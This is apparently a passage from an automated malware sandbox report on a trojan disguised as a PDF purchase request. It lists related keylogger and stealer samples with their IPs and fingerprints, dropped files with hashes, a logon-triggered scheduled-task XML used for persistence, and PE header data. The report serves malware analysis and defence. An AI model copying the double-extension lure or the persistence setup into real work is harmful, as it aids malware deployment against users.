                                                        DHL Delivery Invoice.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                        • 77.88.21.158
                                                        la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                        • 100.43.91.146
                                                        CLOUDFLARENETUSfiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 172.67.177.134
                                                        http://www.javatpoint.com.cach3.com/Get hashmaliciousUnknownBrowse
                                                        • 104.21.43.239
                                                        hesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 104.21.67.152
                                                        Hesap hareketleriniz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 104.21.67.152
                                                        Fiyat Teklifi_2038900001-MOKAPTO-06122024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 104.21.67.152
                                                        NewOrder12052024.jsGet hashmaliciousRemcosBrowse
                                                        • 172.67.187.200
                                                        16547.jsGet hashmaliciousMassLogger RATBrowse
                                                        • 172.67.177.134
                                                        https://skillbridge.ca/onlinePaymentverify.htmlGet hashmaliciousUnknownBrowse
                                                        • 104.18.95.41
                                                        4f9o4398o3ff34f.lNK.lnkGet hashmaliciousUnknownBrowse
                                                        • 104.21.80.171
                                                        DM6vAAgoCw.exeGet hashmaliciousOrcus, XmrigBrowse
                                                        • 172.67.74.152

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0efiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 104.26.13.205
                                                        Fiyat Teklifi_2038900001-MOKAPTO-06122024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 104.26.13.205
                                                        NewOrder12052024.jsGet hashmaliciousRemcosBrowse
                                                        • 104.26.13.205
                                                        16547.jsGet hashmaliciousMassLogger RATBrowse
                                                        • 104.26.13.205
                                                        PO54782322024.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.13.205
                                                        965600.invoice.exeGet hashmaliciousFormBookBrowse
                                                        • 104.26.13.205
                                                        BQ_PO#385995.exeGet hashmaliciousRedLine, Snake Keylogger, VIP Keylogger, XWormBrowse
                                                        • 104.26.13.205
                                                        somg.mp3.lnkGet hashmaliciousUnknownBrowse
                                                        • 104.26.13.205
                                                        file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                        • 104.26.13.205
                                                        Cooperative Agreement0000800380.docx.exeGet hashmaliciousBabadeda, Blank GrabberBrowse
                                                        • 104.26.13.205

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1216
                                                        Entropy (8bit):5.34331486778365
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                        Malicious:true
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vmPeKTe.exe.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\vmPeKTe.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1216
                                                        Entropy (8bit):5.34331486778365
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):2232
                                                        Entropy (8bit):5.379071839957789
                                                        Encrypted:false
                                                        SSDEEP:48:bWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZWUyus:bLHxvIIwLgZ2KRHWLOugws
                                                        MD5:E3B2A4809FCFC47A9F41FCEA1377AE30
                                                        SHA1:AC5463D0C3DFFF1F257DAFF97D07DAF1439895FB
                                                        SHA-256:8985F8B91983EEE6086A68B57FBBBD72EA8DA3F0593B34418343B7061A3C1E35
                                                        SHA-512:9B9E8EA8C7E743D53C189EB47DCBEBD76C87416C1FAEEF3577F61AD44D06C5B85DB893CF802944231778EF1BE7CF7E03F3492BCFD0C64BB6ACDDC81763359102
                                                        Malicious:false
                                                        Preview:@...e.................................&..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_24bxm0q3.prc.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qpxfvdo.2zi.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5sycyjij.px2.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hgr3ff4a.xag.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ia1mpqme.r2z.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqchvm4x.mzz.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sdcb2k3l.3tm.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wcyar2mk.vwj.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\tmpDF64.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe
                                                        File Type:XML 1.0 document, ASCII text
                                                        Category:dropped
                                                        Size (bytes):1580
                                                        Entropy (8bit):5.104767274521453
                                                        Encrypted:false
                                                        SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtokxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTRv
                                                        MD5:589A25E50D934F7EBCE5D13081878A1B
                                                        SHA1:AC303A18A7D2E3D33851E0DBF735195C3D689641
                                                        SHA-256:E2C1523C6CE42EA62097B1914434235DAFDD75AED1E753D0EE8001A7E0AF617C
                                                        SHA-512:20CDE94427208B37FC09ACBD2E011A05233DCA9846DC7E5D7522A6120A1807A3F82B0343F0ED6A92E1C92C8C5D10B4A4840581E01A9023AD853299653BA45590
                                                        Malicious:true
                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                        C:\Users\user\AppData\Local\Temp\tmpF3B7.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\vmPeKTe.exe
                                                        File Type:XML 1.0 document, ASCII text
                                                        Category:dropped
                                                        Size (bytes):1580
                                                        Entropy (8bit):5.104767274521453
                                                        Encrypted:false
                                                        SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtokxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTRv
                                                        MD5:589A25E50D934F7EBCE5D13081878A1B
                                                        SHA1:AC303A18A7D2E3D33851E0DBF735195C3D689641
                                                        SHA-256:E2C1523C6CE42EA62097B1914434235DAFDD75AED1E753D0EE8001A7E0AF617C
                                                        SHA-512:20CDE94427208B37FC09ACBD2E011A05233DCA9846DC7E5D7522A6120A1807A3F82B0343F0ED6A92E1C92C8C5D10B4A4840581E01A9023AD853299653BA45590
                                                        Malicious:false
                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                        C:\Users\user\AppData\Roaming\vmPeKTe.exe

                                                        Download File
                                                        Process:C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):785408
                                                        Entropy (8bit):7.7070044593487435
                                                        Encrypted:false
                                                        SSDEEP:12288:YBWSRnXtXj5tPu1rXhJxsPaDOIZUAiOqhTGavbMARXC/WaiaYbY:OjFj3Pgr/ImUAiPFrzXC/qa
                                                        MD5:2293CE96EC6BF9E7D7214091D74E4C35
                                                        SHA1:316245E8D58E8A6C8FEC19010EEABF43171F608B
                                                        SHA-256:E963A79ED303A65D9FF3B15753909309D4156D38CFF9E403E39AB1A72E0113E5
                                                        SHA-512:7ED7799D79A63D9A5D6047533E9ABCEF0A6BCB0438BC23AAAF39D34498E3180AE3EFC7E6FD69E615C72CD7DC32D210E1C68FA07424D456FB8B1A03FCA4DB9D54
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 58%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....RRg..............0.................. ........@.. .......................@............@.................................t...W............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......p,..........9........9..........................................hE...*.e.....@6...8f.....J.R.z@.......@....#'.9u>.x....Gg.'2....c.....v.Yf...@O..`/...+.UKo#../..;./... ...B.kC.a..1..2.}t}.X1...K.+*.4...W*.;dx.$.u.W...GJ.....p.u.e.?.ah&$....'['.....+.o|..%c^.G.R9.^......Z....BIlP9^@.|b.xe.l.........}..........A.%k.....`86........Eb..%.gF.N.g.....bB.0eX..Q*...`...;G......W..?.s.....6P"...o.0.Z.....y..o..N..wK...z..$..D}O.]w_......c..'.._i...J1|..

                                                        C:\Users\user\AppData\Roaming\vmPeKTe.exe:Zone.Identifier

                                                        Download File
                                                        Process:C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.7070044593487435
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Windows Screen Saver (13104/52) 0.07%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        File name:REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe
                                                        File size:785'408 bytes
                                                        MD5:2293ce96ec6bf9e7d7214091d74e4c35
                                                        SHA1:316245e8d58e8a6c8fec19010eeabf43171f608b
                                                        SHA256:e963a79ed303a65d9ff3b15753909309d4156d38cff9e403e39ab1a72e0113e5
                                                        SHA512:7ed7799d79a63d9a5d6047533e9abcef0a6bcb0438bc23aaaf39d34498e3180ae3efc7e6fd69e615c72cd7dc32d210e1c68fa07424d456fb8b1a03fca4db9d54
                                                        SSDEEP:12288:YBWSRnXtXj5tPu1rXhJxsPaDOIZUAiOqhTGavbMARXC/WaiaYbY:OjFj3Pgr/ImUAiPFrzXC/qa
                                                        TLSH:EFF4E19C7600F44FC903CA364EA4FD74AA646DEA5707C3039AD72EEFB91D9568E041E2
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....RRg..............0.................. ........@.. .......................@............@................................

                                                        File Icon

                                                        Icon Hash:0697f0b9b0b1d827

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4bface
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x675252DE [Fri Dec 6 01:26:54 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xbfa740x57.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc00000x1bb0.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xc20000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
